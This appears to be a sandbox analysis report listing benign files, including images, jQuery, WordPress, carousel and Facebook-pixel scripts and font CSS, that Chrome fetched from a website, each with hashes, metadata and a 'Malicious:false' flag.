                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules["lead-generation"]&&TCB_Front.setModuleLoadedStatus("lead-generation",!1),((t,e)=>{if(e.isModuleLoaded("lead-generation"))return;t(window).on("tcb_after_dom_ready",(()=>{const r=t(e.Utils.isEditorPage()?"#tve_editor":"body");a.initRadioInputs(r),a.initCheckboxInputs(r),e.Utils.isEditorPage()||(t(".thrv_lead_generation").tve_front_lead_generation(),a.initRecaptcha(),a.initTurnstile(),a.initCustomSpamPreventor())}));const a={initRadioInputs(e){t('[data-default="1"]').closest(".tve_lg_radio_wrapper").addClass("tve-state-expanded"),e.off("change.inputradio").on("change.inputradio",".tve_lg_radio_wrapper input",(function(){const e=t(this).closest(".tve_lg_radio_wrapper");e.siblings(".tve-state-expanded").removeClass("tve-state-expanded"),e.addClass("tve-state-expanded")}))},initCheckboxInputs(e){e.off("change.inputcheckbox").on("change.inputcheckbox",".tve_lg_checkbox_wrapper input",(function(){const e=t(this);e.closest(".tve_lg_checkbox_wrapper").toggleClass("
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x431, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):52877
                                                                                                                                                                                                                                                        Entropy (8bit):7.977817011975378
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:SJnSayUJa4sEeSLt/u3V8LvejUxLKVKZt0LgBjDqttUWgZc0XVYaY6puA1vhpZF:SJnpyUQ4sEeGgL1K7sgBjDqttuCXwDZF
                                                                                                                                                                                                                                                        MD5:BFC19DFD4219D61CD38C309455E18CDA
                                                                                                                                                                                                                                                        SHA1:DCEDC550BF5D050C5CCCE3333E62BF3E42313EC1
                                                                                                                                                                                                                                                        SHA-256:27AFD046A3C66D3E5F760BCD2388897E9BEFEA363EC49740FF553E684E52476F
                                                                                                                                                                                                                                                        SHA-512:DBDAB5130AA3D10B7957D295D7D96C548116C3CDA250CD61C1597488AC33E149F4D41BC7F9DBC834157847120D95EA9A3C24EE2B7203565BDDE635153989CD03
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....]......D.Z!.5..$..9.Mv:<^T(. ...S>./}.j7y.`.j.|.l..{.uf..:59.t..B....\..-.7[......@..2.P..X.0*....x..h..")...CY...($....Z..f\..Z...?.3C...1..H.T%+.u.Z.{9....s..1...h^G...u.w.a]+..,.3...(..e...W.....-....s.d....?.5...-...4..|. ...-[U..K..%.Xg..Z......Wt....H..w.Z6E>_...<W.a.......8..m...u...;[..l....j.e$....\......t$.........q...EO-..F.R.8.....S.U..glY....\.:..o3...
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 5, xresolution=185, yresolution=193, software=HDR+ 1.0.604778939zd, datetime=2024:09:05 18:42:27, xresolution=242, yresolution=250, GPS-Data], baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):62443
                                                                                                                                                                                                                                                        Entropy (8bit):7.94703391189811
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:FL3bh2QrT7CKUl4SMdc7c7PLUS5XUfFPP+zukzNQhdD/AqTi8:iQr/ollc7PLUuEfR6ukED/AC1
                                                                                                                                                                                                                                                        MD5:7F16CCE5F8288C1FA3C64A8D7530DE1D
                                                                                                                                                                                                                                                        SHA1:46F42E873DFD7BD9A2D5064DA3AD7ED4C68608BE
                                                                                                                                                                                                                                                        SHA-256:17E0774942AE86B663BC03D47B0E221E4F36E905CB9E03B29B3D1A314F1F1F05
                                                                                                                                                                                                                                                        SHA-512:C7619E442C2C546C1A9B56B4F243E8720EAFE1A0B68799B095A0620D3D673836DED009FA1E67646632AA65BB72F0DE4BDDDC3EE222655C452620E6B5FE6589D1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 5.H.......H.......HDR+ 1.0.604778939zd.2024:09:05 18:42:27.H.......H.......(."...........'.......$...........0232............................................222.........222.........222.........0100................................................................................................................................................................................................3...........4..."...............&.......................6...........J...........^...........f...........n...........v...........~...........................................-04:00.-04:00.-04:00.Google.Pixel 5 back camera 4.38mm f/1.73..2..@B......d...2024:09:05 18:42:27.2024:09:05 18:42:27.s...d.......d.......d...............d.................................................N...........W.........
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (43468), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):43468
                                                                                                                                                                                                                                                        Entropy (8bit):5.088830600406703
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:JQUCE4h8aKY8iLU6AbNjYh8XMnjYdXRRJ6KZ0YCQCfbbQqdnvGrsiRFBDx:U/kbNzEtnvGrbtDx
                                                                                                                                                                                                                                                        MD5:C38A57AFEAC52B36E7D388C9361557B0
                                                                                                                                                                                                                                                        SHA1:C444755439AA7358B0D48D613D3889009D6AD975
                                                                                                                                                                                                                                                        SHA-256:F3CA085758D97F5B96744402A4749852139FFE2FA36DEFE830C97F5DFFDC5113
                                                                                                                                                                                                                                                        SHA-512:B820B8DC79F07420C0DFC477F95477D8CB397B3FDC76AA42FBDBC849DFC4CC2C125797F04D7BC52874541B9911E67F3287A73F8D1509E921085E965ADA304632
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js?ver=10.4.2
                                                                                                                                                                                                                                                        Preview:(()=>{var i={87097:(i,e,t)=>{var o,s,n;!function(){"use strict";s=[t(41669)],o=function(i){var e,t=window.Slick||{};(e=0,t=function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,t){return i('<button type="button" />').text(t+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:0,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide:!1,touchMove:!0,touchThreshold:5,useCSS:!0
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):71570
                                                                                                                                                                                                                                                        Entropy (8bit):5.482134577528733
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:1rPs4Hb1mF7JsAMrf8Hrw1XGIQ73xHN3XhgaBEyXT4jhqXz++C2QucXxj0wflfDg:msxfmmj6yU8l5+lMQVt5pLjnmPY2ZxyT
                                                                                                                                                                                                                                                        MD5:146D03538610544F0B5DF98B70BC29EB
                                                                                                                                                                                                                                                        SHA1:7AD311D14C4108264335495B2BADE4F46F0115AC
                                                                                                                                                                                                                                                        SHA-256:5C3C78A0C20CA0DB7B1927A8E14E39E902C8FBCB00D6AF2CD716513EA0616254
                                                                                                                                                                                                                                                        SHA-512:B83AA5CF9CC390D6CC96BE8A154F1D7791C04A6905FE212B19E2F73CA5402872FDC1B2D1AB5C8264E1D58AC70AAAED44A78A54449B3D7DC767F282B541987630
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(()=>{var t={41523:t=>{!function(e,o){const i=[];o.addResizeCallback=function(t,e){return-1===i.indexOf(t)&&(t.$$scope=e,i.push(t)),o},t.exports=function(){let t=o.$window.width();o.$window.off("resize.tar").on("resize.tar",(function(){o.$window.width()!==t&&(e.each(i,(function(t,e){e.call(e.$$scope||this)})),t=o.$window.width())}))}}(ThriveGlobal.$j,TCB_Front)},49110:t=>{!function(e,o){const i=[];o.add_scroll_callback=function(t,e){return-1===i.indexOf(t)&&(t.$$scope=e,i.push(t)),o},t.exports=function(){let t=o.$document.scrollTop(),n="";o.$window.off("scroll.tar").on("scroll.tar",(function(){const s=o.$document.scrollTop(),r=s>=t?"down":"up",a=n!==r;t=s,n=r,e.each(i,(function(t,e){e.call(e.$$scope||this,s,r,a)}))})),o.$window.trigger("scroll")}}(ThriveGlobal.$j,TCB_Front)},11481:()=>{!function(t){"use strict";const e=function(e,o){this.el=t(e),this.options=t.extend({},t.fn.typed.defaults,o),this.isInput=this.el.is("input"),this.attr=this.options.attr,this.showCursor=!this.isInput&&th
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):87553
                                                                                                                                                                                                                                                        Entropy (8bit):5.262620498676155
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                                                                                                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                                                                                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                                                                                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                                                                                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 5, xresolution=185, yresolution=193, software=HDR+ 1.0.604778939zd, datetime=2024:11:23 15:10:52, xresolution=242, yresolution=250, GPS-Data], baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):47643
                                                                                                                                                                                                                                                        Entropy (8bit):7.935675117551009
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:+y3XDayT+Zckv1bQyPb43IYZKHNL9JX9Zymd1NRJ9UiNaS5eM/BhMLQLm31tJVlL:+y3XDayO1ksoRiJ9hjz5eSBhOQSl1lz/
                                                                                                                                                                                                                                                        MD5:196B0E757571DEF8E98B8FD5234A71AB
                                                                                                                                                                                                                                                        SHA1:06143AB3BCC68F673E55FDC87A8F8664DF5E87BE
                                                                                                                                                                                                                                                        SHA-256:F79B8FF367961B2F145AA1FC8360C33763A6242D00C02FC193A764D9CED66F78
                                                                                                                                                                                                                                                        SHA-512:522E2ACD087EE8E2D5229F145165D8B5892B5190E53A7E58E8AF47387F9511B964FAD03CAD8F0298B0955731869ED6AF3FDB6ED01C3E7AB2D2B5CAE053B2F550
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 5.H.......H.......HDR+ 1.0.604778939zd.2024:11:23 15:10:52.H.......H.......(."...........'.......b...........0232............................................288.........288.........288.........0100................................................................................................................................................................................................3...........4..."...............&.......................6...........J...........^...........f...........n...........v...........~...........................................-05:00.-05:00.-05:00.Google.Pixel 5 back camera 4.38mm f/1.73..a..@B......d...2024:11:23 15:10:52.2024:11:23 15:10:52.....d.......d.......d...............d...V.............................................N...........W.........
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9284)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):245020
                                                                                                                                                                                                                                                        Entropy (8bit):5.453937864649824
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:6FLeYH8W1WJ/37Oec8NteqZEbkxZNsucrl0xYurPK7d3OCX:6FLeYcgWJzm8NNfFcrHurPK7d3/X
                                                                                                                                                                                                                                                        MD5:645219BB69D1C9F06CC935CC54DC1C2A
                                                                                                                                                                                                                                                        SHA1:F14ACE0F9745356BC77D888857EF32A5EADC8615
                                                                                                                                                                                                                                                        SHA-256:5332FD32D8BE28EB2531721220E8C3C561000378988BE4B4D7F97568F0B3F224
                                                                                                                                                                                                                                                        SHA-512:CB41C3768945DA663B54A29758D6BDFFFD4666C6EEEB253017748831CB424CB54113CFE9DF06959E980E0A7B9EACB6F0D9DD1016B3A9B1BC900FAB79A30AF837
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):21464
                                                                                                                                                                                                                                                        Entropy (8bit):5.303481082929494
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                                                                                                                                                                        MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                                                                                                                                                                        SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                                                                                                                                                                        SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                                                                                                                                                                        SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (59458)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):114706
                                                                                                                                                                                                                                                        Entropy (8bit):4.924852554644207
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:HaeJuf7Qg5MG7H+qehvP0x2pUk44Q03Pm:Qf7Qg5MG7H+qehvP0x2pUk4T0O
                                                                                                                                                                                                                                                        MD5:8C9F31823282E4E056EB0AA7FAC262A9
                                                                                                                                                                                                                                                        SHA1:DC3B1A37381E079FDA8DB59C1A9469852CD18B80
                                                                                                                                                                                                                                                        SHA-256:3BB38D0F302677FF4104564454F60F495133579D6E6DFB722B3DE850DF596502
                                                                                                                                                                                                                                                        SHA-512:39F239C875550BF9A31254EED1F0358EA3C6309D9FCBF6005D8852843EAF60BC20B8626D169F810A6C71B7DCDB769B8512314B89BA1FDEEA2CB3089BE9D21AE0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
                                                                                                                                                                                                                                                        Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, resolutionunit=2, manufacturer=Canon, model=Canon EOS R5, xresolution=153, yresolution=161, software=Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh), datetime=2024:12:09 14:52:55, xresolution=242, yresolution=250], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):65279
                                                                                                                                                                                                                                                        Entropy (8bit):7.953611391007993
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:G3Y7nLpRVQMj1vbrfzGPLSsBZJMtdnsrfmp7jYfghlsL3Z:G3YzLpRVjvfiPLdZCnNxOisL3Z
                                                                                                                                                                                                                                                        MD5:7FD97D04F62BE05144C2A77583BC75FE
                                                                                                                                                                                                                                                        SHA1:A1579802FA77A86C4FDB2AB03D08B8509F077C20
                                                                                                                                                                                                                                                        SHA-256:C1970383908202AFD952320E220875171BDD55B029209F0651DE1F4980F0FBCA
                                                                                                                                                                                                                                                        SHA-512:D879C1F7CEF8C80D2F2468CDA50E86E2D4DB979CEBDDC297857239D658DFBBC61594C02AC49DEE415841B9CC2431B80E40EC58BA8EC56EF523FBC3E9A3417B75
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,.....hExif..II*.......(...........................................................1...5.......2...................................i...............Canon.Canon EOS R5.,.......,.......Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh).2024:12:09 14:52:55.H.......H....... .0...........2..........."...........'...................0231................................08..........08..................................................................................................1...........2...........4...........5...................................................................(...........0...........8...........@...........H...........P...........X.......-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.....d...#.......2024:12:09 07:35:26.2024:12:09 07:35:26..`e.@B..........................B.........}......_S........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ....
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4741)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4776
                                                                                                                                                                                                                                                        Entropy (8bit):5.153085086858448
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                                                                                                                                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                                                                                                                                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                                                                                                                                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                                                                                                                                                                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2427
                                                                                                                                                                                                                                                        Entropy (8bit):5.315474681604979
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:jOEaHJc+u3OEaON0x/OpaHJc+u3OpaON0x/OwhaHJc+u3OwhaON0xD:jOEaHJc+u3OEaONsOpaHJc+u3OpaONs0
                                                                                                                                                                                                                                                        MD5:A0FB6131D2DC3E84CE05CB081F0EEBF5
                                                                                                                                                                                                                                                        SHA1:C75150BC7ABC85B57B9B88BB99FE832DC2F6B57F
                                                                                                                                                                                                                                                        SHA-256:9B70E5EDDEDCFA7B5C01E5B7B3DFC518AAE5BB5336B2FDD1903198804E55A9AF
                                                                                                                                                                                                                                                        SHA-512:B4A4578050BBB70A6FC54E4E10C6804F124AAC0DADFB5EE1A38F8FFF7ABD2DBE659AB03DCE9A247CB7CFC0138125373B29E3419563812C1F382FEE114DE240CA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=Sen:400,700,800&subset=latin&display=swap"
                                                                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'Sen';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sen/v9/6xKjdSxYI9_3kvWNEmo.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Sen';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sen/v9/6xKjdSxYI9_3nPWN.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Sen';. font-style: normal;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sen/v9/6xKjdSxYI9_3kvWNEmo.woff2) for
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4358)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5520
                                                                                                                                                                                                                                                        Entropy (8bit):5.07877659735423
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:PwSrH5hrG6Qpw1rIN2Bkqsu6B89w1y+7Y3qv5StcXyuC0r4oYeTnf49uVhWWTfju:PwSrq6Qpw1rI2k1u6i9woa3hSSCP9+XC
                                                                                                                                                                                                                                                        MD5:6823120876C9AFC8929418C9A6F8E343
                                                                                                                                                                                                                                                        SHA1:90B0ADB37D70FFEC5F9189C36BB0027C310C9502
                                                                                                                                                                                                                                                        SHA-256:B65B3DE1BC923B9355248A0D941A0EAEE15DFB9A6B8EADB51323A8DF6189DCD1
                                                                                                                                                                                                                                                        SHA-512:63D84226815C831245754ADB30040EE72DCF218D01F991A5619675374BBE3B706E3721D32F5120D9D27E500813E8214244992B3875B3A7E7E4BC7DED5201183A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
